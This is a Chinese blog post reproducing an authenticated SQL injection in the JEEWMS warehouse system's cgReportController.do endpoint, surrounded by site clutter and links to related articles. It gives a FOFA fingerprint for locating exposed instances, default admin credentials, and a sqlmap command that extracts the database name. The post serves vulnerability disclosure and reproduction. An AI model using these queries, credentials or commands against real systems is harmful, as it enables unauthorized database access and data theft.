JEEWMS系统cgReportController.do存在SQL注入

Sword-heart

已于 2025-05-25 16:21:18 修改

阅读量282

点赞数 1

分类专栏：漏洞复现文章标签：安全 web安全漏洞复现网络安全漏洞利用漏洞库 sql注入

于 2025-05-25 16:17:01 首次发布

本文链接：https://blog.csdn.net/jd_cx/article/details/148209331

版权

漏洞复现专栏收录该内容

181 篇文章

订阅专栏

免责声明

本文章仅做网络安全技术研究使用！严禁用于非法犯罪行为，请严格遵守国家法律法规；请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。

问题描述

JEEWMS系统cgReportController.do存在SQL注入

fofa

body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"

poc

构建 POC，登录后端捕获数据包，并替换 cookie

admin/llg123
http://localhost:8083/jeewms/cgReportController.do?list&id=1

使用 SQLMAP 重现和构造执行语句

 python sqlmap.py -u "http://localhost:8083/jeewms/cgReportController.do?list&id=1" --cookie="XXXXX" -p id --current-db

问题来源

JEEWMS-cgReportController.do？List&ID 存在 SQL 注入 ·问题 #IBFTVK ·JeeWMS/JeeWMS - Gitee.com

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sword-heart

关注关注

1
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

JeeWMS cgReportController.do SQL注入漏洞复现(CVE-2024-57760)

0xSec

02-06

2293

JeeWMS cgReportController.do 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

JeeWMS graphReportController.do SQL注入漏洞复现(CVE-2025-0392)

iSee857的博客

02-28

436

JeeWMS 在/graphReportController.do接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。（CVE-2024-0392）

参与评论您还未登录，请先登录后发表或查看评论

JEEWMS系统graphReportController.do存在SQL注入

swordheart的博客

05-25

167

JEEWMS系统graphReportController.do存在SQL注入

JeeWMS cgReportController.do 多个参数SQL注入漏洞(CVE-2024-57760)

qq_43540348的博客

02-28

243

JeeWMS基于JAVA的智能仓储管理系统（支持3PL（三方物流）和厂内物流），包含PDA端和WEB端，功能涵盖WMS（仓库管理系统），OMS（订单管理系统），BMS（财务管理系统），TMS（运输管理系统），成功应用于多家国内知名大客户，客户群体：冷链，干仓，快消品，汽车主机厂和配件厂等行业。

JEEWMS存在任意文件读取漏洞

zkaqlaoniao的博客

06-20

442

JEEWMS基于JAVA的仓库管理系统（支持3PL（三方物流）和厂内物流），包含PDA端和WEB端，功能涵盖WMS，OMS，BMS（计费管理系统），TMS，成功应用于多家国内知名大客户，客户群体：冷链，干仓，快消品，汽车主机厂和配件厂等行业。申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等。帮助你在面试中脱颖而出。

JeewMS 漏洞

03-09

此外，另一个值得注意的安全问题是 `cgReportController.do` 中存在的 SQL 注入漏洞（CVE-2024-57760）。SQL 注入是一种常见的 Web 应用程序攻击手段，允许攻击者执行未经授权的数据查询操作，可能导致数据泄露或...

安全生产台账系统

hanwei020502的博客

06-14

206

Trivy离线扫描：容器安全实践指南!

tersky的专栏

06-13

560

Trivy离线扫描：容器安全实践指南!

软件测试之简单基础的安全测试方法（另外包含软测面试题库）

qq_39635178的博客

06-14

384

阅读本文前请注意最后编辑时间，文章内容可能与目前最新的技术发展情况相去甚远。欢迎各位评论与私信，指出错误或是进行交流等。

代码填空题技术实现：突破 highlight.js 安全限制的工程实践

半岛铁盒里

06-11

1174

本文探讨了在交互式代码教育平台中实现代码填空题的技术方案。针对highlight.js过滤HTML标签导致无法直接插入输入框的问题，作者提出了先完成语法高亮再修改DOM的双阶段解决方案。关键技术包括：1) 利用nextTick确保Vue DOM更新；2) 采用MutationObserver监听高亮渲染完成；3) 在渲染后插入受控输入框元素。方案解决了安全性问题，同时优化了用户交互体验，包括输入框索引跟踪和状态保存。特别强调了在处理异步渲染时，MutationObserver比嵌套nextTick更可靠。该

水库大坝安全监测之渗流监测

weixin_48039531的博客

06-12

718

通过在坝体和坝基不同位置埋设测压管或渗压计等仪器，监测不同深度、不同位置的渗流压力，绘制等势线，分析渗流场分布情况，评估大坝防渗效果与渗透稳定性。结合大坝整体安全状况，综合分析渗流监测数据与其他监测项目（如变形监测、应力应变监测等）数据，为大坝维护、加固等决策提供全面、科学的支持，确保水库大坝长期安全稳定运行。通过在坝体或坝基中铺设光纤，利用光纤中光信号与周围环境相互作用产生的变化，如光的强度、相位、频率等，感知渗流场参数，如渗流压力、温度等。对比不同部位的渗流压力分布，评估大坝防渗效果和渗流场的均匀性。

Proof of Talk专访CertiK联创顾荣辉：全周期安全方案护航Web3生态

weixin_58310340的博客

06-11

842

6月10日，CertiK联合创始人兼CEO顾荣辉在Proof of Talk 2025举办期间，接受大会官方专访，分享了他对Web3安全现状的观察以及CertiK的安全战略布局。

2025年渗透测试面试题总结-小鹏[实习]安全工程师（题目+回答）

soc的博客

06-10

958

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

菌菇食用攻略：从营养解析到安全指南，解锁科学食菌

2503_90208218的博客

06-11

1205

菌菇食用安全与营养指南菌菇营养丰富，富含蛋白质、维生素D及抗氧化物质，但食用不当存在风险。安全食用需注意：彻底加热（中心温度达74℃以上）、控制摄入量（成人每日100-150g）、特殊人群谨慎选择（过敏者、孕妇、慢性病患者等）。野生菌中毒事件频发，切勿轻信民间鉴别方法，应选择正规渠道购买。娱乐化传播菌菇中毒危害严重，需加强科学认知。合理食用菌菇需平衡其营养价值与潜在风险，遵循个体化膳食原则。

防御性安全：数字取证

最新发布

qq_41179365的博客

06-14

779

【代码】防御性安全：数字取证。

dMSA 滥用（BadSuccessor）导致权限提升

ITmoster的博客

06-10

702

ADAudit Plus作为基于用户行为分析（UBA）的变更审计方案，支持对 Active Directory、文件服务器、Windows 服务器及工作站进行全面监控。通过实时警报和深度审计，帮助组织快速检测异常行为，抵御如 BadSuccessor 等高级漏洞攻击。

如何安全地准备 iPhone 以旧换新（分步说明）

Digitally的博客

06-10

965

如果您准备以旧换新 iPhone，务必做好充分的准备工作，以保护您的个人数据并确保以旧换新过程顺利进行。本指南将逐步指导您如何准备 iPhone 以旧换新。此流程将确保您的个人数据被清除，配件已取消配对，并且您的手机已准备好交付，不会留下任何残留信息。

云原生安全实践：CI/CD流水线集成DAST工具

like21a的博客

06-11

1177

通过将 DAST 集成到 CI/CD 流水线，企业可以实现“安全左移”，在开发早期发现并修复漏洞，降低修复成本。结合 SAST、SCA 等工具，并遵循最佳实践，可构建高效、安全的云原生应用交付体系。🚧 您已阅读完全文99%！缺少1%的关键操作：加入「炎码燃料仓」🚀 获得：√ 开源工具红黑榜√ 项目落地避坑指南√ 每周BUG修复进度+1%彩蛋（温馨提示：本工坊不打灰工，只烧脑洞🔥）

F5深化与Red Hat战略合作，赋能企业AI规模化安全部署

a1235824的博客

06-12

979

全球领先的应用交付和API安全解决方案提供商F5(NASDAQ:FFIV),日前宣布与全球领先的企业开源软件解决方案提供商Red Hat扩大战略合作,旨在助力企业部署和扩展安全、高性能的人工智能(AI)应用。我们坚信AI的未来属于开源,Red Hat OpenShift AI与F5强大的安全与可观测能力结合,将为企业提供关键工具,帮助他们无论选择在何处运行,都能更有信心地构建和扩展AI应用。为满足这些日益增长的市场需求,F5正与Red Hat展开合作,共同聚焦企业实现AI落地所需的核心构建模块。